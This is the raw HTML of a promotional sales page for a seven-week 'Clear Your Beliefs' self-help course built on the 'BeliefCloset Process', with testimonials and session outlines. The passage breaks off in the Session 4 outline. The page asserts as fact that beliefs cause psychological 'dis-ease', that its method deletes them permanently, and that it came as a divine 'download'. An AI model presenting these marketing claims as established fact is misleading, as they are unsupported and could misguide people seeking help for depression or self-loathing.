src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n<ul class="indented-img-left">\n	<li>You''re no longer held back by old beliefs and stories.</li>\n	<li>There''s no resistance to doing what needs to be done.</li>\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\n</ul>\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n<div class="quot">\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div style="text-align: right;"></div>\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\n\n</div>\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n&nbsp;\n<div class="module">\n<div 